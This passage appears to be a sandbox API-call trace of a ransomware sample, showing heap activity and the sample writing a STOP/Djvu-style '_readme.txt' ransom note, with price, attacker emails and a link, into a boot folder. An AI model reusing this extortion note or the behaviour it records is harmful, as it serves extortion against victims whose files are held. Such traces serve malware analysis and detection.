0x31cf750 [0090.862] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.862] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.862] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.862] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.862] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.862] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.862] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.863] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.863] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.863] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.863] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.863] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.863] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.863] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.863] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.863] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.863] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.863] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.863] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.863] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.863] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.863] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.863] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.863] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.863] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.863] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.863] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.863] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.863] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.863] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.863] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.863] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.864] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.864] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.864] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.864] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.864] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.864] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.864] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.864] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.864] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.864] PathFindFileNameW (pszPath="C:\\Boot\\nl-NL\\") returned="nl-NL\\" [0090.864] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.864] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.864] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0090.864] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.864] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0090.864] PathFindFileNameW (pszPath="") returned="" [0090.864] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.864] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0090.865] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0090.865] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x800) returned 0x31d1120 [0090.865] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0090.865] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x810) returned 0x99c9c68 [0090.865] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.865] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.865] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.865] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.865] FreeLibrary (hLibModule=0x75670000) returned 1 [0090.865] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.865] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d1120 | out: hHeap=0x680000) returned 1 [0090.865] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.865] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.865] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x81c) returned 0x99c9c68 [0090.866] PathAppendW (in: pszPath="C:\\Boot\\nl-NL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 1 [0090.866] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.866] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.866] PathFileExistsW (pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 0 [0090.870] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x7d00) returned 0x99f52d8 [0090.870] lstrcpyW (in: lpString1=0x99f52d8, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" [0090.870] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0090.870] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99cad78 [0090.870] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\_readme.txt" (normalized: "c:\\boot\\nl-nl\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0090.870] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8b0) returned 0x31cf750 [0090.870] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x857) returned 0x3189d50 [0090.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x3189d50, cbMultiByte=2135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1112 [0090.871] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x316f0d0 [0090.871] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3189d50 | out: hHeap=0x680000) returned 1 [0090.871] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.871] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1111 [0090.871] WriteFile (in: hFile=0x5cc, lpBuffer=0x316f0d0*, nNumberOfBytesToWrite=0x457, lpNumberOfBytesWritten=0x9ccfb64, lpOverlapped=0x0 | out: lpBuffer=0x316f0d0*, lpNumberOfBytesWritten=0x9ccfb64*=0x457, lpOverlapped=0x0) returned 1 [0090.872] CloseHandle (hObject=0x5cc) returned 1 [0090.872] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316f0d0 | out: hHeap=0x680000) returned 1 [0090.872] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99cad78 | out: hHeap=0x680000) returned 1 [0090.872] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f52d8 | out: hHeap=0x680000) returned 1 [0090.872] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.872] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.872] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa33989a0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa33989a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0090.873] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.873] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa33989a0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa33989a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.873] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0090.873] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa33989a0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa33989a0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa33989a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0090.873] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa33989a0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa33989a0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa33989a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0090.873] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0090.873] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.873] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef28 | out: hHeap=0x680000) returned 1 [0090.873] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef28 [0090.873] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0090.873] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.873] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.873] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.873] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.873] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.873] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.873] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.873] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.873] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.873] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.874] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.874] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.874] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.874] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.874] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.874] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.874] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.874] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99e3968 [0090.874] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.874] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.874] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.874] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.874] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.874] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.874] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.874] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.874] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.874] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.874] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.875] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.875] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0090.875] RtlAllocateHeap 